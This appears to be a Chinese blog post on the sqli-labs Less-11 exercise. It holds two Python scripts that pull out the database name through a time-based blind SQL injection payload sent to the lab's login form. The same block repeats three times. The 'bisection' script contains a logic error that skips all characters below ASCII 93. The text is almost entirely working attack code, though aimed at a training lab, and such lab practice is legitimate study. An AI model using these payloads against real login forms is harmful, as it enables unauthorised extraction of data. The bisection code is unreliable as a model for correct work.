python编写sqli-labs11关

关于sql时间盲注爆破数据库名

未使用二分法

import requests
import datetime

# Module-level header dict; it is never passed to requests.post below, and the
# key is spelled with spaces, so it would not be a valid User-Agent header anyway.
headers = {
    "User - Agent": "Mozilla / 5.0(Windows NT 6.1;Win64;x64;rv: 82.0) Gecko / 20100101Firefox / 82.0"
}


def main():
    """Recover the current database name of the sqli-labs Less-11 target one character at a time.

    For each position 1..8 every candidate ASCII code 65..121 is tried in turn with a POST
    to the lab's login form; the first candidate for which the page no longer contains
    "admin" is taken as that position's character. The decision is made on the response
    body, not on elapsed time — the sleep(1) in the payload only slows the failing probes.
    Each form payload and each recovered character are printed as the loop runs, and the
    assembled name is printed at the end.

    Defender's view: every probe is a POST whose uname field carries the literal
    `If(ascii(substr(database()` / `sleep(1)`; that string in request logs is the thing
    to alert on, and a parameterised query in the login handler removes the vector.
    """
    target = "http://192.168.0.100/sqli-labs-master/Less-11/"
    payload = "admin'and If(ascii(substr(database(),{0},1))>{1},1,sleep(1))#"
    database = ""
    for position in range(1, 9):
        for code in range(65, 122):
            form = {
                "uname": payload.format(position, code),
                "passwd": "11",
            }
            print(form)
            response = requests.post(url=target, data=form)
            # A page that still contains "admin" means the injected `> code`
            # comparison held, so the character is larger: keep scanning.
            if "admin" in response.text:
                continue
            print(chr(code))
            database += chr(code)
            break
    print(database)


if __name__ == "__main__":
    # Elapsed wall-clock time for the whole run.
    starttime = datetime.datetime.now()
    main()
    endtime = datetime.datetime.now()
    print(endtime - starttime)


使用二分法

import requests
import datetime
# Time-based blind injection using the ascii() function
# 1. write the blind-injection function
# 2. write the bisection function
# 3. write the ascii conversion function


def func():
    """Compute the split points injection_datebase() uses to narrow each character's range.

    Sets the module globals f, g and h from the candidate code range 65..122:
    f is the midpoint (93), g the upper quartile (107) and h the lower quartile (79).
    injection_datebase() reads these globals, so this must run first; main() does so.
    """
    global f, g, h
    length_ascii = int(122-65)
    e = int(length_ascii/2)    # half the width of the range: 28
    f = 65 + int(e)  # value midway between 65 and 122: 93

    g = int(65 + 3/2*int(e)) # 93+14: 107
    h = int(65 + 1/2*int(e))  # 65+14: 79


def injection_datebase():
    """Recover the current database name from the sqli-labs Less-11 login form, one character at a time.

    For each position 1..8 the candidate ASCII range is first narrowed with comparison
    requests against the module globals f, g and h set by func(), then the remaining
    quarter is scanned linearly. Every decision is taken on the response body, not on
    elapsed time: the script treats a page that still contains "admin" as meaning the
    injected `> N` comparison held. Characters are printed as they are found and the
    assembled name is printed at the end.

    NOTE(review): the branch entered when the first comparison fails immediately tests
    `if "admin" in res.text` again, which cannot hold there, so codes below f (93) are
    never scanned and such positions contribute nothing to the result.

    Defender's view: every probe is a POST whose uname field carries the literal
    `If(ascii(substr(database()` / `sleep(1)`; that string in request logs is the thing
    to alert on, and a parameterised query in the login handler removes the vector.
    """
    database = ""
    headers = {  # built but never passed to requests.post
        "User - Agent": "Mozilla / 5.0(Windows NT 6.1;Win64;x64;rv: 82.0) Gecko / 20100101Firefox / 82.0"
    }
    url = "http://192.168.0.100/sqli-labs-master/Less-11/"  # re-assigned with the same value inside the loop
    for n in range(1,9):
        data = {
                "uname": "admin'and If(ascii(substr(database(),{0},1))>{1},1,sleep(1))#".format(n, str(f)),# is the code above 93?
                "passwd": "11"
            }
        url = "http://192.168.0.100/sqli-labs-master/Less-11/"
        res = requests.post(url=url,data=data)
        if "admin" in res.text:              # ascii code is above the midpoint 93
            res = requests.post(url="http://192.168.0.100/sqli-labs-master/Less-11/", data={
                "uname": "admin'and If(ascii(substr(database(),{0},1))>{1},1,sleep(1))#".format(n,str(g)),# is it above 107?
                "passwd": "11"})
            if "admin" in res.text:
                # Linear scan of the top quarter: the first code for which the page no
                # longer contains "admin" is taken as this position's character.
                for i in range(g,122):    #107-122
                    data = {
                        "uname": "admin'and If(ascii(substr(database(),{0},1))>{1},1,sleep(1))#".format(n, i),
                        "passwd": "11"

                    }
                    url = "http://192.168.0.100/sqli-labs-master/Less-11/"
                    print(data)
                    res = requests.post(url=url, data=data)
                    if "admin" not in res.text:
                        print(chr(i))
                        database += str(chr(i))
                        break
            elif "admin" not in res.text:
                # Same linear scan over the third quarter.
                for i in range(f, g):  #93-107
                    data = {
                        "uname": "admin'and If(ascii(substr(database(),{0},1))>{1},1,sleep(1))#".format(n, i),
                        "passwd": "11"

                    }
                    url = "http://192.168.0.100/sqli-labs-master/Less-11/"
                    print(data)
                    res = requests.post(url=url, data=data)
                    if "admin" not in res.text:
                        print(chr(i))
                        database += str(chr(i))
                        break

        elif "admin" not in res.text:       # ascii code is not above 93
            if "admin" in res.text:  # NOTE(review): cannot hold here — res.text was just found not to contain "admin", so nothing below runs
                res = requests.post(url="http://192.168.0.100/sqli-labs-master/Less-11/", data={
                    "uname": "admin'and If(ascii(substr(database(),{0},1))>{1},1,sleep(1))#".format(n, h),
                    # is it above 79?
                    "passwd": "11"})
                if "admin" in res.text:     # above 79
                    for i in range(h, f):  # 79-93
                        data = {
                            "uname": "admin'and If(ascii(substr(database(),{0},1))>{1},1,sleep(1))#".format(n, i),
                            "passwd": "11"

                        }
                        url = "http://192.168.0.100/sqli-labs-master/Less-11/"
                        print(data)
                        res = requests.post(url=url, data=data)
                        if "admin" not in res.text:
                            print(chr(i))
                            database += str(chr(i))
                            break
                elif "admin" not in res.text:   # below 79
                    for i in range(65, h):  # 65-79
                        data = {
                            "uname": "admin'and If(ascii(substr(database(),{0},1))>{1},1,sleep(1))#".format(n, i),
                            "passwd": "11"

                        }
                        url = "http://192.168.0.100/sqli-labs-master/Less-11/"
                        print(data)
                        res = requests.post(url=url, data=data)
                        if "admin" not in res.text:
                            print(chr(i))
                            database += str(chr(i))
                            break
    print(database)  # assembled name; positions that were never resolved contribute nothing


def main():
    """Compute the split points, then run the character-by-character extraction."""

    func()
    injection_datebase()


if __name__ == "__main__":
    # Elapsed wall-clock time for the whole run; the sleep(1) in the payload
    # fires on every failed comparison and dominates it.
    starttime = datetime.datetime.now()
    main()
    endtime = datetime.datetime.now()
    print(endtime-starttime)

关于sql时间盲注爆破数据库名

未使用二分法

import requests
import datetime

# Module-level header dict; it is never passed to requests.post below, and the
# key is spelled with spaces, so it would not be a valid User-Agent header anyway.
headers = {
    "User - Agent": "Mozilla / 5.0(Windows NT 6.1;Win64;x64;rv: 82.0) Gecko / 20100101Firefox / 82.0"
}


def main():
    """Recover the current database name of the sqli-labs Less-11 target one character at a time.

    For each position 1..8 every candidate ASCII code 65..121 is tried in turn with a POST
    to the lab's login form; the first candidate for which the page no longer contains
    "admin" is taken as that position's character. The decision is made on the response
    body, not on elapsed time — the sleep(1) in the payload only slows the failing probes.
    Each form payload and each recovered character are printed as the loop runs, and the
    assembled name is printed at the end.

    Defender's view: every probe is a POST whose uname field carries the literal
    `If(ascii(substr(database()` / `sleep(1)`; that string in request logs is the thing
    to alert on, and a parameterised query in the login handler removes the vector.
    """
    target = "http://192.168.0.100/sqli-labs-master/Less-11/"
    payload = "admin'and If(ascii(substr(database(),{0},1))>{1},1,sleep(1))#"
    database = ""
    for position in range(1, 9):
        for code in range(65, 122):
            form = {
                "uname": payload.format(position, code),
                "passwd": "11",
            }
            print(form)
            response = requests.post(url=target, data=form)
            # A page that still contains "admin" means the injected `> code`
            # comparison held, so the character is larger: keep scanning.
            if "admin" in response.text:
                continue
            print(chr(code))
            database += chr(code)
            break
    print(database)


if __name__ == "__main__":
    # Elapsed wall-clock time for the whole run.
    starttime = datetime.datetime.now()
    main()
    endtime = datetime.datetime.now()
    print(endtime - starttime)


使用二分法

import requests
import datetime
# Time-based blind injection using the ascii() function
# 1. write the blind-injection function
# 2. write the bisection function
# 3. write the ascii conversion function


def func():
    """Compute the split points injection_datebase() uses to narrow each character's range.

    Sets the module globals f, g and h from the candidate code range 65..122:
    f is the midpoint (93), g the upper quartile (107) and h the lower quartile (79).
    injection_datebase() reads these globals, so this must run first; main() does so.
    """
    global f, g, h
    length_ascii = int(122-65)
    e = int(length_ascii/2)    # half the width of the range: 28
    f = 65 + int(e)  # value midway between 65 and 122: 93

    g = int(65 + 3/2*int(e)) # 93+14: 107
    h = int(65 + 1/2*int(e))  # 65+14: 79


def injection_datebase():
    """Recover the current database name from the sqli-labs Less-11 login form, one character at a time.

    For each position 1..8 the candidate ASCII range is first narrowed with comparison
    requests against the module globals f, g and h set by func(), then the remaining
    quarter is scanned linearly. Every decision is taken on the response body, not on
    elapsed time: the script treats a page that still contains "admin" as meaning the
    injected `> N` comparison held. Characters are printed as they are found and the
    assembled name is printed at the end.

    NOTE(review): the branch entered when the first comparison fails immediately tests
    `if "admin" in res.text` again, which cannot hold there, so codes below f (93) are
    never scanned and such positions contribute nothing to the result.

    Defender's view: every probe is a POST whose uname field carries the literal
    `If(ascii(substr(database()` / `sleep(1)`; that string in request logs is the thing
    to alert on, and a parameterised query in the login handler removes the vector.
    """
    database = ""
    headers = {  # built but never passed to requests.post
        "User - Agent": "Mozilla / 5.0(Windows NT 6.1;Win64;x64;rv: 82.0) Gecko / 20100101Firefox / 82.0"
    }
    url = "http://192.168.0.100/sqli-labs-master/Less-11/"  # re-assigned with the same value inside the loop
    for n in range(1,9):
        data = {
                "uname": "admin'and If(ascii(substr(database(),{0},1))>{1},1,sleep(1))#".format(n, str(f)),# is the code above 93?
                "passwd": "11"
            }
        url = "http://192.168.0.100/sqli-labs-master/Less-11/"
        res = requests.post(url=url,data=data)
        if "admin" in res.text:              # ascii code is above the midpoint 93
            res = requests.post(url="http://192.168.0.100/sqli-labs-master/Less-11/", data={
                "uname": "admin'and If(ascii(substr(database(),{0},1))>{1},1,sleep(1))#".format(n,str(g)),# is it above 107?
                "passwd": "11"})
            if "admin" in res.text:
                # Linear scan of the top quarter: the first code for which the page no
                # longer contains "admin" is taken as this position's character.
                for i in range(g,122):    #107-122
                    data = {
                        "uname": "admin'and If(ascii(substr(database(),{0},1))>{1},1,sleep(1))#".format(n, i),
                        "passwd": "11"

                    }
                    url = "http://192.168.0.100/sqli-labs-master/Less-11/"
                    print(data)
                    res = requests.post(url=url, data=data)
                    if "admin" not in res.text:
                        print(chr(i))
                        database += str(chr(i))
                        break
            elif "admin" not in res.text:
                # Same linear scan over the third quarter.
                for i in range(f, g):  #93-107
                    data = {
                        "uname": "admin'and If(ascii(substr(database(),{0},1))>{1},1,sleep(1))#".format(n, i),
                        "passwd": "11"

                    }
                    url = "http://192.168.0.100/sqli-labs-master/Less-11/"
                    print(data)
                    res = requests.post(url=url, data=data)
                    if "admin" not in res.text:
                        print(chr(i))
                        database += str(chr(i))
                        break

        elif "admin" not in res.text:       # ascii code is not above 93
            if "admin" in res.text:  # NOTE(review): cannot hold here — res.text was just found not to contain "admin", so nothing below runs
                res = requests.post(url="http://192.168.0.100/sqli-labs-master/Less-11/", data={
                    "uname": "admin'and If(ascii(substr(database(),{0},1))>{1},1,sleep(1))#".format(n, h),
                    # is it above 79?
                    "passwd": "11"})
                if "admin" in res.text:     # above 79
                    for i in range(h, f):  # 79-93
                        data = {
                            "uname": "admin'and If(ascii(substr(database(),{0},1))>{1},1,sleep(1))#".format(n, i),
                            "passwd": "11"

                        }
                        url = "http://192.168.0.100/sqli-labs-master/Less-11/"
                        print(data)
                        res = requests.post(url=url, data=data)
                        if "admin" not in res.text:
                            print(chr(i))
                            database += str(chr(i))
                            break
                elif "admin" not in res.text:   # below 79
                    for i in range(65, h):  # 65-79
                        data = {
                            "uname": "admin'and If(ascii(substr(database(),{0},1))>{1},1,sleep(1))#".format(n, i),
                            "passwd": "11"

                        }
                        url = "http://192.168.0.100/sqli-labs-master/Less-11/"
                        print(data)
                        res = requests.post(url=url, data=data)
                        if "admin" not in res.text:
                            print(chr(i))
                            database += str(chr(i))
                            break
    print(database)  # assembled name; positions that were never resolved contribute nothing


def main():
    """Compute the split points, then run the character-by-character extraction."""

    func()
    injection_datebase()


if __name__ == "__main__":
    # Elapsed wall-clock time for the whole run; the sleep(1) in the payload
    # fires on every failed comparison and dominates it.
    starttime = datetime.datetime.now()
    main()
    endtime = datetime.datetime.now()
    print(endtime-starttime)

关于sql时间盲注爆破数据库名

未使用二分法

import requests
import datetime

# Module-level header dict; it is never passed to requests.post below, and the
# key is spelled with spaces, so it would not be a valid User-Agent header anyway.
headers = {
    "User - Agent": "Mozilla / 5.0(Windows NT 6.1;Win64;x64;rv: 82.0) Gecko / 20100101Firefox / 82.0"
}


def main():
    """Recover the current database name of the sqli-labs Less-11 target one character at a time.

    For each position 1..8 every candidate ASCII code 65..121 is tried in turn with a POST
    to the lab's login form; the first candidate for which the page no longer contains
    "admin" is taken as that position's character. The decision is made on the response
    body, not on elapsed time — the sleep(1) in the payload only slows the failing probes.
    Each form payload and each recovered character are printed as the loop runs, and the
    assembled name is printed at the end.

    Defender's view: every probe is a POST whose uname field carries the literal
    `If(ascii(substr(database()` / `sleep(1)`; that string in request logs is the thing
    to alert on, and a parameterised query in the login handler removes the vector.
    """
    target = "http://192.168.0.100/sqli-labs-master/Less-11/"
    payload = "admin'and If(ascii(substr(database(),{0},1))>{1},1,sleep(1))#"
    database = ""
    for position in range(1, 9):
        for code in range(65, 122):
            form = {
                "uname": payload.format(position, code),
                "passwd": "11",
            }
            print(form)
            response = requests.post(url=target, data=form)
            # A page that still contains "admin" means the injected `> code`
            # comparison held, so the character is larger: keep scanning.
            if "admin" in response.text:
                continue
            print(chr(code))
            database += chr(code)
            break
    print(database)


if __name__ == "__main__":
    # Elapsed wall-clock time for the whole run.
    starttime = datetime.datetime.now()
    main()
    endtime = datetime.datetime.now()
    print(endtime - starttime)


使用二分法

import requests
import datetime
# Time-based blind injection using the ascii() function
# 1. write the blind-injection function
# 2. write the bisection function
# 3. write the ascii conversion function


def func():
    """Compute the split points injection_datebase() uses to narrow each character's range.

    Sets the module globals f, g and h from the candidate code range 65..122:
    f is the midpoint (93), g the upper quartile (107) and h the lower quartile (79).
    injection_datebase() reads these globals, so this must run first; main() does so.
    """
    global f, g, h
    length_ascii = int(122-65)
    e = int(length_ascii/2)    # half the width of the range: 28
    f = 65 + int(e)  # value midway between 65 and 122: 93

    g = int(65 + 3/2*int(e)) # 93+14: 107
    h = int(65 + 1/2*int(e))  # 65+14: 79


def injection_datebase():
    """Recover the current database name from the sqli-labs Less-11 login form, one character at a time.

    For each position 1..8 the candidate ASCII range is first narrowed with comparison
    requests against the module globals f, g and h set by func(), then the remaining
    quarter is scanned linearly. Every decision is taken on the response body, not on
    elapsed time: the script treats a page that still contains "admin" as meaning the
    injected `> N` comparison held. Characters are printed as they are found and the
    assembled name is printed at the end.

    NOTE(review): the branch entered when the first comparison fails immediately tests
    `if "admin" in res.text` again, which cannot hold there, so codes below f (93) are
    never scanned and such positions contribute nothing to the result.

    Defender's view: every probe is a POST whose uname field carries the literal
    `If(ascii(substr(database()` / `sleep(1)`; that string in request logs is the thing
    to alert on, and a parameterised query in the login handler removes the vector.
    """
    database = ""
    headers = {  # built but never passed to requests.post
        "User - Agent": "Mozilla / 5.0(Windows NT 6.1;Win64;x64;rv: 82.0) Gecko / 20100101Firefox / 82.0"
    }
    url = "http://192.168.0.100/sqli-labs-master/Less-11/"  # re-assigned with the same value inside the loop
    for n in range(1,9):
        data = {
                "uname": "admin'and If(ascii(substr(database(),{0},1))>{1},1,sleep(1))#".format(n, str(f)),# is the code above 93?
                "passwd": "11"
            }
        url = "http://192.168.0.100/sqli-labs-master/Less-11/"
        res = requests.post(url=url,data=data)
        if "admin" in res.text:              # ascii code is above the midpoint 93
            res = requests.post(url="http://192.168.0.100/sqli-labs-master/Less-11/", data={
                "uname": "admin'and If(ascii(substr(database(),{0},1))>{1},1,sleep(1))#".format(n,str(g)),# is it above 107?
                "passwd": "11"})
            if "admin" in res.text:
                # Linear scan of the top quarter: the first code for which the page no
                # longer contains "admin" is taken as this position's character.
                for i in range(g,122):    #107-122
                    data = {
                        "uname": "admin'and If(ascii(substr(database(),{0},1))>{1},1,sleep(1))#".format(n, i),
                        "passwd": "11"

                    }
                    url = "http://192.168.0.100/sqli-labs-master/Less-11/"
                    print(data)
                    res = requests.post(url=url, data=data)
                    if "admin" not in res.text:
                        print(chr(i))
                        database += str(chr(i))
                        break
            elif "admin" not in res.text:
                # Same linear scan over the third quarter.
                for i in range(f, g):  #93-107
                    data = {
                        "uname": "admin'and If(ascii(substr(database(),{0},1))>{1},1,sleep(1))#".format(n, i),
                        "passwd": "11"

                    }
                    url = "http://192.168.0.100/sqli-labs-master/Less-11/"
                    print(data)
                    res = requests.post(url=url, data=data)
                    if "admin" not in res.text:
                        print(chr(i))
                        database += str(chr(i))
                        break

        elif "admin" not in res.text:       # ascii code is not above 93
            if "admin" in res.text:  # NOTE(review): cannot hold here — res.text was just found not to contain "admin", so nothing below runs
                res = requests.post(url="http://192.168.0.100/sqli-labs-master/Less-11/", data={
                    "uname": "admin'and If(ascii(substr(database(),{0},1))>{1},1,sleep(1))#".format(n, h),
                    # is it above 79?
                    "passwd": "11"})
                if "admin" in res.text:     # above 79
                    for i in range(h, f):  # 79-93
                        data = {
                            "uname": "admin'and If(ascii(substr(database(),{0},1))>{1},1,sleep(1))#".format(n, i),
                            "passwd": "11"

                        }
                        url = "http://192.168.0.100/sqli-labs-master/Less-11/"
                        print(data)
                        res = requests.post(url=url, data=data)
                        if "admin" not in res.text:
                            print(chr(i))
                            database += str(chr(i))
                            break
                elif "admin" not in res.text:   # below 79
                    for i in range(65, h):  # 65-79
                        data = {
                            "uname": "admin'and If(ascii(substr(database(),{0},1))>{1},1,sleep(1))#".format(n, i),
                            "passwd": "11"

                        }
                        url = "http://192.168.0.100/sqli-labs-master/Less-11/"
                        print(data)
                        res = requests.post(url=url, data=data)
                        if "admin" not in res.text:
                            print(chr(i))
                            database += str(chr(i))
                            break
    print(database)  # assembled name; positions that were never resolved contribute nothing


def main():
    """Compute the split points, then run the character-by-character extraction."""

    func()
    injection_datebase()


if __name__ == "__main__":
    # Elapsed wall-clock time for the whole run; the sleep(1) in the payload
    # fires on every failed comparison and dominates it.
    starttime = datetime.datetime.now()
    main()
    endtime = datetime.datetime.now()
    print(endtime-starttime)



